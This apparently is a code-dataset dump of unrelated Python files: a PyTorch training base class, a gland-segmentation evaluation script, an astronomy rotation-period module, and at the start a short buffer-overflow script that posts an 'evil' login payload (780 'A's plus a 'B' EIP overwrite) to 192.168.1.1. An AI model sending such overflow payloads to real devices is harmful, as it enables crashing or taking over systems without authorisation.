buffer = "C" * 16
payload = padding + eip + buffer
content = "username=" + payload + "&password=A"
buffer = "POST /login HTTP/1.1\r\n"
buffer += "Host: 192.168.1.1\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://192.168.209.10/login\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: "+str(len(content))+"\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "\r\n"
buffer += content
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 80))
s.send(buffer)
s.close()
except:
print "Cloud not connect!"
| 28.45 | 104 | 0.581722 | #!/usr/bin/python
import socket
try:
print "\n Sending ""evil"" buffer..."
padding = "A" * 780
eip = "B" * 4
buffer = "C" * 16
payload = padding + eip + buffer
content = "username=" + payload + "&password=A"
buffer = "POST /login HTTP/1.1\r\n"
buffer += "Host: 192.168.1.1\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://192.168.209.10/login\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: "+str(len(content))+"\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "\r\n"
buffer += content
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 80))
s.send(buffer)
s.close()
except:
print "Cloud not connect!"
| 0 | 0 | 0 |
9a1dfacdee354f4a82f68846e5e83586c85bed27 | 7,323 | py | Python | core/base_model.py | Janspiry/distributed-pytorch-template | 8b612c8877d4ec3ffba28fcb3bc1ccfda44b6c10 | [
"MIT"
] | 3 | 2022-01-30T07:10:02.000Z | 2022-02-11T10:16:43.000Z | core/base_model.py | Janspiry/A-Seed-Project-For-Deep-Learning-by-Pytorch | 8b612c8877d4ec3ffba28fcb3bc1ccfda44b6c10 | [
"MIT"
] | null | null | null | core/base_model.py | Janspiry/A-Seed-Project-For-Deep-Learning-by-Pytorch | 8b612c8877d4ec3ffba28fcb3bc1ccfda44b6c10 | [
"MIT"
] | null | null | null | import os
from abc import abstractmethod
from functools import partial
import collections
import torch
import torch.nn as nn
import core.util as Util
from core.logger import LogTracker
CustomResult = collections.namedtuple('CustomResult', 'name result')
| 47.245161 | 156 | 0.62092 | import os
from abc import abstractmethod
from functools import partial
import collections
import torch
import torch.nn as nn
import core.util as Util
from core.logger import LogTracker
CustomResult = collections.namedtuple('CustomResult', 'name result')
class BaseModel():
def __init__(self, opt, phase_loader, val_loader, metrics, logger, writer):
""" init model with basic input, which are from __init__(**kwargs) function in inherited class """
self.opt = opt
self.phase = opt['phase']
self.set_device = partial(Util.set_device, rank=opt['global_rank'])
''' process record '''
self.batch_size = self.opt['datasets'][self.phase]['dataloader']['args']['batch_size']
self.epoch = 0
self.iter = 0
self.phase_loader = phase_loader
self.val_loader = val_loader
self.metrics = metrics
''' logger to log file, which only work on GPU 0. writer to tensorboard and result file '''
self.logger = logger
self.writer = writer
self.results_dict = CustomResult([],[]) # {"name":[], "result":[]}
def train(self):
while self.epoch <= self.opt['train']['n_epoch'] and self.iter <= self.opt['train']['n_iter']:
self.epoch += 1
if self.opt['distributed']:
''' sets the epoch for this sampler. When :attr:`shuffle=True`, this ensures all replicas use a different random ordering for each epoch '''
self.phase_loader.sampler.set_epoch(self.epoch)
train_log = self.train_step()
''' save logged informations into log dict '''
train_log.update({'epoch': self.epoch, 'iters': self.iter})
''' print logged informations to the screen and tensorboard '''
for key, value in train_log.items():
self.logger.info('{:5s}: {}\t'.format(str(key), value))
if self.epoch % self.opt['train']['save_checkpoint_epoch'] == 0:
self.logger.info('Saving the self at the end of epoch {:.0f}'.format(self.epoch))
self.save_everything()
if self.epoch % self.opt['train']['val_epoch'] == 0:
self.logger.info("\n\n\n------------------------------Validation Start------------------------------")
if self.val_loader is None:
self.logger.info('Validation stop where dataloader is None, Skip it.')
else:
val_log = self.val_step()
for key, value in val_log.items():
self.logger.info('{:5s}: {}\t'.format(str(key), value))
self.logger.info("\n------------------------------Validation End------------------------------\n\n")
self.logger.info('Number of Epochs/Iterations has reached the limit, End.')
def test(self):
pass
@abstractmethod
def train_step(self):
raise NotImplementedError('You must specify how to train your networks.')
@abstractmethod
def val_step(self):
raise NotImplementedError('You must specify how to do validation on your networks.')
def test_step(self):
pass
def print_network(self, network):
""" print network structure, only work on GPU 0 """
if self.opt['global_rank'] !=0:
return
if isinstance(network, nn.DataParallel) or isinstance(network, nn.parallel.DistributedDataParallel):
network = network.module
s, n = str(network), sum(map(lambda x: x.numel(), network.parameters()))
net_struc_str = '{}'.format(network.__class__.__name__)
self.logger.info('Network structure: {}, with parameters: {:,d}'.format(net_struc_str, n))
self.logger.info(s)
def save_network(self, network, network_label):
""" save network structure, only work on GPU 0 """
if self.opt['global_rank'] !=0:
return
save_filename = '{}_{}.pth'.format(self.epoch, network_label)
save_path = os.path.join(self.opt['path']['checkpoint'], save_filename)
if isinstance(network, nn.DataParallel) or isinstance(network, nn.parallel.DistributedDataParallel):
network = network.module
state_dict = network.state_dict()
for key, param in state_dict.items():
state_dict[key] = param.cpu()
torch.save(state_dict, save_path)
def load_network(self, network, network_label, strict=True):
if self.opt['path']['resume_state'] is None:
return
model_path = "{}_{}.pth".format(self. opt['path']['resume_state'], network_label)
self.logger.info('Loading pretrained model from [{:s}] ...'.format(model_path))
if isinstance(network, nn.DataParallel) or isinstance(network, nn.parallel.DistributedDataParallel):
network = network.module
network.load_state_dict(torch.load(model_path, map_location = lambda storage, loc: Util.set_device(storage)), strict=strict)
def save_training_state(self, optimizers, schedulers):
""" saves training state during training, only work on GPU 0 """
if self.opt['global_rank'] !=0:
return
assert isinstance(optimizers, list) and isinstance(schedulers, list), 'optimizers and schedulers must be a list.'
state = {'epoch': self.epoch, 'iter': self.iter, 'schedulers': [], 'optimizers': []}
for s in schedulers:
state['schedulers'].append(s.state_dict())
for o in optimizers:
state['optimizers'].append(o.state_dict())
save_filename = '{}.state'.format(self.epoch)
save_path = os.path.join(self.opt['path']['checkpoint'], save_filename)
torch.save(state, save_path)
def resume_training(self, optimizers, schedulers):
""" resume the optimizers and schedulers for training, only work when phase is test or resume training enable """
if self.phase!='train' or self. opt['path']['resume_state'] is None:
return
assert isinstance(optimizers, list) and isinstance(schedulers, list), 'optimizers and schedulers must be a list.'
state_path = "{}.state".format(self. opt['path']['resume_state'])
self.logger.info('Loading training state for [{:s}] ...'.format(state_path))
resume_state = torch.load(state_path, map_location = lambda storage, loc: self.set_device(storage))
resume_optimizers = resume_state['optimizers']
resume_schedulers = resume_state['schedulers']
assert len(resume_optimizers) == len(optimizers), 'Wrong lengths of optimizers {} != {}'.format(len(resume_optimizers), len(optimizers))
assert len(resume_schedulers) == len(schedulers), 'Wrong lengths of schedulers {} != {}'.format(len(resume_schedulers), len(schedulers))
for i, o in enumerate(resume_optimizers):
optimizers[i].load_state_dict(o)
for i, s in enumerate(resume_schedulers):
schedulers[i].load_state_dict(s)
self.epoch = resume_state['epoch']
self.iter = resume_state['iter']
def load_everything(self):
pass
@abstractmethod
def save_everything(self):
raise NotImplementedError('You must specify how to save your networks, optimizers and schedulers.')
| 2,606 | 4,438 | 23 |
a9b8a1cbfc37583a3c3b3265e5a00f579fd39128 | 3,300 | py | Python | scripts/evaluate_glas.py | mRcfps/wessup | b27052fc969ac60b443d340d7d10b28605b790a0 | [
"MIT"
] | 8 | 2020-03-01T05:56:49.000Z | 2022-02-12T14:38:42.000Z | scripts/evaluate_glas.py | mRcfps/wessup | b27052fc969ac60b443d340d7d10b28605b790a0 | [
"MIT"
] | null | null | null | scripts/evaluate_glas.py | mRcfps/wessup | b27052fc969ac60b443d340d7d10b28605b790a0 | [
"MIT"
] | 5 | 2020-02-29T01:49:33.000Z | 2022-02-03T20:20:32.000Z | import argparse
import os
from pathlib import Path
import sys
sys.path.append(str(Path(__file__).parent.parent))
import pandas as pd
from skimage.io import imread, imsave
from joblib import Parallel, delayed
from utils.metrics import *
parser = argparse.ArgumentParser()
parser.add_argument('pred_root')
args = parser.parse_args()
glas_root = Path('~/data/GLAS_all').expanduser()
pred_root = Path(args.pred_root).expanduser()
new_pred_root = pred_root.parent / (pred_root.name + '-new')
if not new_pred_root.exists():
new_pred_root.mkdir()
(new_pred_root / 'testA').mkdir()
(new_pred_root / 'testB').mkdir()
executor = Parallel(n_jobs=os.cpu_count())
print('Test A')
print('\nReading predictions and gts ...')
pred_paths = sorted((pred_root / 'testA').glob('*.bmp'))
predictions = executor(delayed(postprocess)(imread(str(pred_path)) / 255) for pred_path in pred_paths)
gts = executor(delayed(imread)(gt_path) for gt_path in sorted((glas_root / 'testA' / 'masks').glob('*.bmp')))
print('Saving new predictions ...')
for pred, pred_path in zip(predictions, pred_paths):
imsave(new_pred_root / 'testA' / pred_path.name, (pred * 255).astype('uint8'))
metrics = compute_metrics(predictions, gts, pred_paths)
metrics.to_csv(pred_root / 'testA.csv')
print('\nTest B')
print('\nReading predictions and gts ...')
pred_paths = sorted((pred_root / 'testB').glob('*.bmp'))
predictions = executor(delayed(postprocess)(imread(str(pred_path)) / 255) for pred_path in pred_paths)
gts = executor(delayed(imread)(gt_path) for gt_path in sorted((glas_root / 'testB' / 'masks').glob('*.bmp')))
print('Saving new predictions ...')
for pred, pred_path in zip(predictions, pred_paths):
imsave(new_pred_root / 'testB' / pred_path.name, (pred * 255).astype('uint8'))
metrics = compute_metrics(predictions, gts, pred_paths)
metrics.to_csv(pred_root / 'testB.csv')
| 33.333333 | 109 | 0.706364 | import argparse
import os
from pathlib import Path
import sys
sys.path.append(str(Path(__file__).parent.parent))
import pandas as pd
from skimage.io import imread, imsave
from joblib import Parallel, delayed
from utils.metrics import *
parser = argparse.ArgumentParser()
parser.add_argument('pred_root')
args = parser.parse_args()
glas_root = Path('~/data/GLAS_all').expanduser()
pred_root = Path(args.pred_root).expanduser()
new_pred_root = pred_root.parent / (pred_root.name + '-new')
if not new_pred_root.exists():
new_pred_root.mkdir()
(new_pred_root / 'testA').mkdir()
(new_pred_root / 'testB').mkdir()
executor = Parallel(n_jobs=os.cpu_count())
def postprocess(pred):
regions = label(pred)
for region_idx in range(regions.max() + 1):
region_mask = regions == region_idx
if region_mask.sum() < 2000:
pred[region_mask] = 0
revert_regions = label(1 - pred)
for region_idx in range(revert_regions.max() + 1):
region_mask = revert_regions == region_idx
if region_mask.sum() < 2000:
pred[region_mask] = 1
return pred
def compute_metrics(predictions, gts, pred_paths):
iterable = list(zip(predictions, gts))
accuracies = executor(delayed(accuracy)(pred, gt) for pred, gt in iterable)
print('Accuracy:', np.mean(accuracies))
dices = executor(delayed(dice)(pred, gt) for pred, gt in iterable)
print('Dice:', np.mean(dices))
detection_f1s = executor(delayed(detection_f1)(pred, gt) for pred, gt in iterable)
print('Detection F1:', np.mean(detection_f1s))
object_dices = executor(delayed(object_dice)(pred, gt) for pred, gt in iterable)
print('Object Dice:', np.mean(object_dices))
object_hausdorffs = executor(delayed(object_hausdorff)(pred, gt) for pred, gt in iterable)
print('Object Hausdorff:', np.mean(object_hausdorffs))
df = pd.DataFrame()
df['detection_f1'] = detection_f1s
df['object_dice'] = object_dices
df['object_hausdorff'] = object_hausdorffs
df.index = [pred_path.name for pred_path in pred_paths]
return df
print('Test A')
print('\nReading predictions and gts ...')
pred_paths = sorted((pred_root / 'testA').glob('*.bmp'))
predictions = executor(delayed(postprocess)(imread(str(pred_path)) / 255) for pred_path in pred_paths)
gts = executor(delayed(imread)(gt_path) for gt_path in sorted((glas_root / 'testA' / 'masks').glob('*.bmp')))
print('Saving new predictions ...')
for pred, pred_path in zip(predictions, pred_paths):
imsave(new_pred_root / 'testA' / pred_path.name, (pred * 255).astype('uint8'))
metrics = compute_metrics(predictions, gts, pred_paths)
metrics.to_csv(pred_root / 'testA.csv')
print('\nTest B')
print('\nReading predictions and gts ...')
pred_paths = sorted((pred_root / 'testB').glob('*.bmp'))
predictions = executor(delayed(postprocess)(imread(str(pred_path)) / 255) for pred_path in pred_paths)
gts = executor(delayed(imread)(gt_path) for gt_path in sorted((glas_root / 'testB' / 'masks').glob('*.bmp')))
print('Saving new predictions ...')
for pred, pred_path in zip(predictions, pred_paths):
imsave(new_pred_root / 'testB' / pred_path.name, (pred * 255).astype('uint8'))
metrics = compute_metrics(predictions, gts, pred_paths)
metrics.to_csv(pred_root / 'testB.csv')
| 1,378 | 0 | 46 |
7c8578fa5f45ed4663d04f117ce01c5ce38b800d | 16,745 | py | Python | stella/rotations.py | afeinstein20/sally | f9ffd78d1c7279012e870f3657812595f18eee74 | [
"MIT"
] | 22 | 2019-06-27T19:43:48.000Z | 2022-03-24T21:32:20.000Z | stella/rotations.py | afeinstein20/sally | f9ffd78d1c7279012e870f3657812595f18eee74 | [
"MIT"
] | 16 | 2020-05-21T22:26:51.000Z | 2022-03-21T13:23:37.000Z | stella/rotations.py | afeinstein20/sally | f9ffd78d1c7279012e870f3657812595f18eee74 | [
"MIT"
] | 11 | 2019-07-19T16:41:15.000Z | 2022-03-11T21:49:04.000Z | import numpy as np
from tqdm import tqdm
import statistics as stats
from astropy import units as u
from scipy.signal import medfilt
from scipy.optimize import curve_fit
from astropy.table import Table, Column
from astropy.timeseries import LombScargle
__all__ = ['MeasureProt']
class MeasureProt(object):
"""
Used for measuring rotation periods.
"""
def __init__(self, IDs, time, flux, flux_err):
"""
Takes in light curve identifiers, time, flux,
and flux errors.
"""
self.IDs = IDs
self.time = time
self.flux = flux
self.flux_err = flux_err
def gauss_curve(self, x, std, scale, mu):
""" Fits a Gaussian to the peak of the LS
periodogram.
Parameters
----------
x : np.array
std : float
Standard deviation of gaussian.
scale : float
Scaling for gaussian.
mu : float
Mean to fit around.
Returns
-------
Gaussian curve.
"""
term1 = 1.0 / (std * np.sqrt(2 * np.pi) )
term2 = np.exp(-0.5 * ((x-mu)/std)**2)
return term1 * term2 * scale
def chiSquare(self, var, mu, x, y, yerr):
""" Calculates chi-square for fitting a Gaussian
to the peak of the LS periodogram.
Parameters
----------
var : list
Variables to fit (std and scale for Gaussian curve).
mu : float
Mean to fit around.
x : np.array
y : np.array
yerr : np.array
Returns
-------
chi-square value.
"""
m = self.gauss(x, var[0], var[1], mu)
return np.sum( (y-m)**2 / yerr**2 )
def fit_LS_peak(self, period, power, arg):
""" Fits the LS periodogram at the peak power.
Parameters
----------
period : np.array
Array of periods from Lomb Scargle routine.
power : np.array
Array of powers from the Lomb Scargle routine.
arg : int
Argmax of the power in the periodogram.
Returns
-------
popt : np.array
Array of best fit values for Gaussian fit.
"""
if arg-40 < 0:
start = 0
else:
start = arg-40
if arg+40 > len(period):
end = len(period)-1
else:
end = arg+40
m = np.arange(start, end, 1, dtype=int)
if arg-20 < 0:
start = 0
else:
start = arg-20
if arg + 20 > len(period):
end = len(period)-1
else:
end = arg+20
subm = np.arange(start, end, 1, dtype=int)
try:
popt = fitting_routine()
except RuntimeError:
popt = np.full(3, np.nan)
# TRIES TO READJUST FITTING WINDOW IF RANGE IS LARGER THAN PERIOD ARRAY
except IndexError:
if np.min(m) <= 0:
m = np.arange(0,arg+40,1,dtype=int)
subm = np.arange(0,arg+20,1, dtype=int)
elif np.max(m) > len(period):
diff = np.max(m) - len(period)
m = np.arange(arg-40-diff, len(period)-diff, 1, dtype=int)
subm = np.arange(arg-20-diff, len(period)-diff-20, 1, dtype=int)
popt = fitting_routine()
return popt
def run_LS(self, minf=1/12.5, maxf=1/0.1, spp=50):
""" Runs LS fit for each light curve.
Parameters
----------
minf : float, optional
The minimum frequency to search in the LS routine. Default = 1/20.
maxf : float, optional
The maximum frequency to search in the LS routine. Default = 1/0.1.
spp : int, optional
The number of samples per peak. Default = 50.
Attributes
----------
LS_results : astropy.table.Table
"""
tab = Table()
periods = np.zeros(len(self.IDs))
stds = np.zeros(len(self.IDs))
peak_power = np.zeros(len(self.IDs))
periods2 = np.zeros(len(self.IDs))
peak_power2 = np.zeros(len(self.IDs))
orbit_flag = np.zeros(len(self.IDs))
orbit_flag1 = np.zeros(len(self.IDs))
orbit_flag2 = np.zeros(len(self.IDs))
for i in tqdm(range(len(self.flux)), desc="Finding most likely periods"):
time, flux, flux_err = self.time[i], self.flux[i], self.flux_err[i]
# SPLITS BY ORBIT
diff = np.diff(time)
brk = np.where(diff >= np.nanmedian(diff)+14*np.nanstd(diff))[0]
if len(brk) > 1:
brk_diff = brk - (len(time)/2)
try:
brk_diff = np.where(brk_diff<0)[0][-1]
except IndexError:
brk_diff = np.argmin(brk_diff)
brk = np.array([brk[brk_diff]], dtype=int)
# DEFINITELY TRIMS OUT EARTHSHINE MOFO
t1, f1 = time[:brk[0]], flux[:brk[0]]#[300:-500], flux[:brk[0]]#[300:-500]
t2, f2 = time[brk[0]:], flux[brk[0]:]#[800:-200], flux[brk[0]:]#[800:-200]
o1_params = per_orbit(t1, f1)
o2_params = per_orbit(t2, f2)
both = np.array([o1_params[0], o2_params[0]])
avg_period = np.nanmedian(both)
flag1 = self.assign_flag(o1_params[0], o1_params[2], o1_params[-1],
avg_period, o1_params[-2], t1[-1]-t1[0])
flag2 = self.assign_flag(o2_params[0], o2_params[2], o2_params[-1],
avg_period, o2_params[-2], t2[-1]-t2[0])
if np.abs(o1_params[1]-avg_period) < 0.5 and np.abs(o2_params[1]-avg_period)<0.5:
flag1 = flag2 = 0.0
if flag1 != 0 and flag2 != 0:
orbit_flag[i] = 1.0
else:
orbit_flag[i] = 0.0
periods[i] = np.nanmedian([o1_params[0], o2_params[0]])
orbit_flag1[i] = flag1
orbit_flag2[i] = flag2
stds[i] = o1_params[-1]
peak_power[i] = o1_params[2]
periods2[i] = o2_params[0]
peak_power2[i] = o1_params[-2]
tab.add_column(Column(self.IDs, 'Target_ID'))
tab.add_column(Column(periods, name='period_days'))
tab.add_column(Column(periods2, name='secondary_period_days'))
tab.add_column(Column(stds, name='gauss_width'))
tab.add_column(Column(peak_power, name='max_power'))
tab.add_column(Column(peak_power2, name='secondary_max_power'))
tab.add_column(Column(orbit_flag, name='orbit_flag'))
tab.add_column(Column(orbit_flag1, name='oflag1'))
tab.add_column(Column(orbit_flag2, name='oflag2'))
tab = self.averaged_per_sector(tab)
self.LS_results = tab
def assign_flag(self, period, power, width, avg, secpow,
maxperiod, orbit_flag=0):
""" Assigns a flag in the table for which periods are reliable.
"""
flag = 100
if period > maxperiod:
flag = 4
if (period < maxperiod) and (power > 0.005):
flag = 3
if (period < maxperiod) and (width <= period*0.6) and (power > 0.005):
flag = 2
if ( (period < maxperiod) and (width <= period*0.6) and
(secpow < 0.96*power) and (power > 0.005)):
flag = 1
if ( (period < maxperiod) and (width <= period*0.6) and
(secpow < 0.96*power) and (np.abs(period-avg)<1.0) and (power > 0.005)):
flag = 0
if flag == 100:
flag = 5
return flag
def averaged_per_sector(self, tab):
""" Looks at targets observed in different sectors and determines
which period measured is likely the best period. Adds a column
to MeasureRotations.LS_results of 'true_period_days' for the
results.
Returns
-------
astropy.table.Table
"""
averaged_periods = np.zeros(len(tab))
flagging = np.zeros(len(tab), dtype=int)
limit = 0.3
for tic in np.unique(self.IDs):
inds = np.where(tab['Target_ID']==tic)[0]
primary = tab['period_days'].data[inds]
secondary = tab['secondary_period_days'].data[inds]
all_periods = np.append(primary, secondary)
# ind_flags = np.append(tab['oflag1'].data[inds],
# tab['oflag2'].data[inds])
avg = np.array([])
tflags = np.array([])
if len(inds) > 1:
try:
mode = stats.mode(np.round(all_periods,2))
if mode > 11.5:
avg = np.full(np.nanmean(primary), len(inds))
tflags = np.full(2, len(inds))
else:
for i in range(len(inds)):
if np.abs(primary[i]-mode) < limit:
avg = np.append(avg, primary[i])
tflags = np.append(tflags,0)
elif np.abs(secondary[i]-mode) < limit:
avg = np.append(avg, secondary[i])
tflags = np.append(tflags,1)
elif np.abs(primary[i]/2.-mode) < limit:
avg = np.append(avg, primary[i]/2.)
tflags = np.append(tflags,0)
elif np.abs(secondary[i]/2.-mode) < limit:
avg = np.append(avg, secondary[i]/2.)
tflags = np.append(tflags,1)
elif np.abs(primary[i]*2.-mode) < limit:
avg = np.append(avg, primary[i]*2.)
tflags = np.append(tflags,0)
elif np.abs(secondary[i]*2.-mode) < limit:
avg = np.append(avg, secondary[i]*2.)
tflags = np.append(tflags,1)
else:
tflags = np.append(tflags, 2)
except:
for i in range(len(inds)):
if tab['oflag1'].data[inds[i]]==0 and tab['oflag2'].data[inds[i]]==0:
avg = np.append(avg, tab['period_days'].data[inds[i]])
tflags = np.append(tflags, 0)
else:
tflags = np.append(tflags,2)
else:
avg = np.nanmean(primary)
if tab['oflag1'].data[inds] == 0 and tab['oflag2'].data[inds]==0:
tflags = 0
else:
tflags = 2
averaged_periods[inds] = np.nanmean(avg)
flagging[inds] = tflags
tab.add_column(Column(flagging, 'Flags'))
tab.add_column(Column(averaged_periods, 'avg_period_days'))
return tab
def phase_lightcurve(self, table=None, trough=-0.5, peak=0.5, kernel_size=101):
"""
Finds and creates a phase light curve that traces the spots.
Uses only complete rotations and extrapolates outwards until the
entire light curve is covered.
Parameters
----------
table : astropy.table.Table, optional
Used for getting the periods of each light curve. Allows users
to use already created tables. Default = None. Will search for
stella.FindTheSpots.LS_results.
trough : float, optional
Sets the phase value at the minimum. Default = -0.5.
peak : float, optional
Sets the phase value t the maximum. Default = 0.5.
kernel_size : odd float, optional
Sets kernel size for median filter smoothing. Default = 15.
Attributes
----------
phases : np.ndarray
"""
if table is None:
table = self.LS_results
PHASES = np.copy(self.flux)
for i in tqdm(range(len(table)), desc="Mapping phases"):
flag = table['Flags'].data[i]
if flag == 0 or flag == 1:
period = table['avg_period_days'].data[i] * u.day
cadences = int(np.round((period.to(u.min)/2).value))
all_time = self.time[i]
all_flux = self.flux[i]
diff = np.diff(all_time)
gaptime = np.where(diff>=np.nanmedian(diff)+12*np.nanstd(diff))[0][0]
t1, f1 = all_time[:gaptime+1], all_flux[:gaptime+1]
t2, f2 = all_time[gaptime+1:], all_flux[gaptime+1:]
o1map = map_per_orbit(t1, f1, kernel_size=101, cadences=cadences)
o2map = map_per_orbit(t2, f2, kernel_size=101, cadences=cadences)
phase = np.append(o1map, o2map)
else:
phase = np.zeros(len(self.flux[i]))
PHASES[i] = phase
self.phases = PHASES
| 35.476695 | 97 | 0.478232 | import numpy as np
from tqdm import tqdm
import statistics as stats
from astropy import units as u
from scipy.signal import medfilt
from scipy.optimize import curve_fit
from astropy.table import Table, Column
from astropy.timeseries import LombScargle
__all__ = ['MeasureProt']
class MeasureProt(object):
"""
Used for measuring rotation periods.
"""
def __init__(self, IDs, time, flux, flux_err):
"""
Takes in light curve identifiers, time, flux,
and flux errors.
"""
self.IDs = IDs
self.time = time
self.flux = flux
self.flux_err = flux_err
def gauss_curve(self, x, std, scale, mu):
""" Fits a Gaussian to the peak of the LS
periodogram.
Parameters
----------
x : np.array
std : float
Standard deviation of gaussian.
scale : float
Scaling for gaussian.
mu : float
Mean to fit around.
Returns
-------
Gaussian curve.
"""
term1 = 1.0 / (std * np.sqrt(2 * np.pi) )
term2 = np.exp(-0.5 * ((x-mu)/std)**2)
return term1 * term2 * scale
def chiSquare(self, var, mu, x, y, yerr):
""" Calculates chi-square for fitting a Gaussian
to the peak of the LS periodogram.
Parameters
----------
var : list
Variables to fit (std and scale for Gaussian curve).
mu : float
Mean to fit around.
x : np.array
y : np.array
yerr : np.array
Returns
-------
chi-square value.
"""
m = self.gauss(x, var[0], var[1], mu)
return np.sum( (y-m)**2 / yerr**2 )
def fit_LS_peak(self, period, power, arg):
""" Fits the LS periodogram at the peak power.
Parameters
----------
period : np.array
Array of periods from Lomb Scargle routine.
power : np.array
Array of powers from the Lomb Scargle routine.
arg : int
Argmax of the power in the periodogram.
Returns
-------
popt : np.array
Array of best fit values for Gaussian fit.
"""
def fitting_routine():
popt, pcov = curve_fit(self.gauss_curve, period[m], power[m],
p0 = [(np.nanmax(period[subm]) - np.nanmin(period[subm]))/2.0,
0.02,
period[arg]],
maxfev = 5000)
return popt
if arg-40 < 0:
start = 0
else:
start = arg-40
if arg+40 > len(period):
end = len(period)-1
else:
end = arg+40
m = np.arange(start, end, 1, dtype=int)
if arg-20 < 0:
start = 0
else:
start = arg-20
if arg + 20 > len(period):
end = len(period)-1
else:
end = arg+20
subm = np.arange(start, end, 1, dtype=int)
try:
popt = fitting_routine()
except RuntimeError:
popt = np.full(3, np.nan)
# TRIES TO READJUST FITTING WINDOW IF RANGE IS LARGER THAN PERIOD ARRAY
except IndexError:
if np.min(m) <= 0:
m = np.arange(0,arg+40,1,dtype=int)
subm = np.arange(0,arg+20,1, dtype=int)
elif np.max(m) > len(period):
diff = np.max(m) - len(period)
m = np.arange(arg-40-diff, len(period)-diff, 1, dtype=int)
subm = np.arange(arg-20-diff, len(period)-diff-20, 1, dtype=int)
popt = fitting_routine()
return popt
def run_LS(self, minf=1/12.5, maxf=1/0.1, spp=50):
""" Runs LS fit for each light curve.
Parameters
----------
minf : float, optional
The minimum frequency to search in the LS routine. Default = 1/20.
maxf : float, optional
The maximum frequency to search in the LS routine. Default = 1/0.1.
spp : int, optional
The number of samples per peak. Default = 50.
Attributes
----------
LS_results : astropy.table.Table
"""
def per_orbit(t, f):
nonlocal maxf, spp
minf = 1/(t[-1]-t[0])
if minf > 1/12.0:
minf = 1/12.0
freq, power = LombScargle(t, f).autopower(minimum_frequency=minf,
maximum_frequency=maxf,
samples_per_peak=spp)
arg = np.argmax(power)
per = 1.0/freq
popt = self.fit_LS_peak(per, power, arg)
## SEARCHES & MASKS RESONANCES OF THE BEST-FIT PERIOD
perlist = per[arg] * np.array([0.5, 1.0, 2.0, 4.0, 8.0])
remove_res = np.zeros(len(per))
maskreg = int(spp/1.5)
for p in perlist:
where = np.where( (per <= p))[0]
if len(where) > 0:
ind = int(where[0])
if ind-maskreg > 0 and ind<len(per)-maskreg:
remove_res[int(ind-maskreg):int(ind+maskreg)] = 1
elif ind < maskreg:
remove_res[0:int(maskreg)] = 1
elif ind > len(per)-maskreg:
remove_res[int(len(per)-maskreg):len(per)] = 1
if perlist[1] == 1/minf:
remove_res[0:int(spp/2)] = 1
rr = remove_res == 0
arg1 = np.argmax(power[rr])
## REDOS PERIOD ROUTINE FOR SECOND HIGHEST PEAK
if arg1 == len(per[rr]):
arg1 = int(arg1-3)
popt2 = self.fit_LS_peak(per[rr], power[rr], arg1)
maxpower = power[arg]
secpower = power[rr][arg1]
bestperiod = per[arg]
secbperiod = per[rr][arg1]
bestwidth = popt[0]
return bestperiod, secbperiod, maxpower, secpower, bestwidth
tab = Table()
periods = np.zeros(len(self.IDs))
stds = np.zeros(len(self.IDs))
peak_power = np.zeros(len(self.IDs))
periods2 = np.zeros(len(self.IDs))
peak_power2 = np.zeros(len(self.IDs))
orbit_flag = np.zeros(len(self.IDs))
orbit_flag1 = np.zeros(len(self.IDs))
orbit_flag2 = np.zeros(len(self.IDs))
for i in tqdm(range(len(self.flux)), desc="Finding most likely periods"):
time, flux, flux_err = self.time[i], self.flux[i], self.flux_err[i]
# SPLITS BY ORBIT
diff = np.diff(time)
brk = np.where(diff >= np.nanmedian(diff)+14*np.nanstd(diff))[0]
if len(brk) > 1:
brk_diff = brk - (len(time)/2)
try:
brk_diff = np.where(brk_diff<0)[0][-1]
except IndexError:
brk_diff = np.argmin(brk_diff)
brk = np.array([brk[brk_diff]], dtype=int)
# DEFINITELY TRIMS OUT EARTHSHINE MOFO
t1, f1 = time[:brk[0]], flux[:brk[0]]#[300:-500], flux[:brk[0]]#[300:-500]
t2, f2 = time[brk[0]:], flux[brk[0]:]#[800:-200], flux[brk[0]:]#[800:-200]
o1_params = per_orbit(t1, f1)
o2_params = per_orbit(t2, f2)
both = np.array([o1_params[0], o2_params[0]])
avg_period = np.nanmedian(both)
flag1 = self.assign_flag(o1_params[0], o1_params[2], o1_params[-1],
avg_period, o1_params[-2], t1[-1]-t1[0])
flag2 = self.assign_flag(o2_params[0], o2_params[2], o2_params[-1],
avg_period, o2_params[-2], t2[-1]-t2[0])
if np.abs(o1_params[1]-avg_period) < 0.5 and np.abs(o2_params[1]-avg_period)<0.5:
flag1 = flag2 = 0.0
if flag1 != 0 and flag2 != 0:
orbit_flag[i] = 1.0
else:
orbit_flag[i] = 0.0
periods[i] = np.nanmedian([o1_params[0], o2_params[0]])
orbit_flag1[i] = flag1
orbit_flag2[i] = flag2
stds[i] = o1_params[-1]
peak_power[i] = o1_params[2]
periods2[i] = o2_params[0]
peak_power2[i] = o1_params[-2]
tab.add_column(Column(self.IDs, 'Target_ID'))
tab.add_column(Column(periods, name='period_days'))
tab.add_column(Column(periods2, name='secondary_period_days'))
tab.add_column(Column(stds, name='gauss_width'))
tab.add_column(Column(peak_power, name='max_power'))
tab.add_column(Column(peak_power2, name='secondary_max_power'))
tab.add_column(Column(orbit_flag, name='orbit_flag'))
tab.add_column(Column(orbit_flag1, name='oflag1'))
tab.add_column(Column(orbit_flag2, name='oflag2'))
tab = self.averaged_per_sector(tab)
self.LS_results = tab
def assign_flag(self, period, power, width, avg, secpow,
maxperiod, orbit_flag=0):
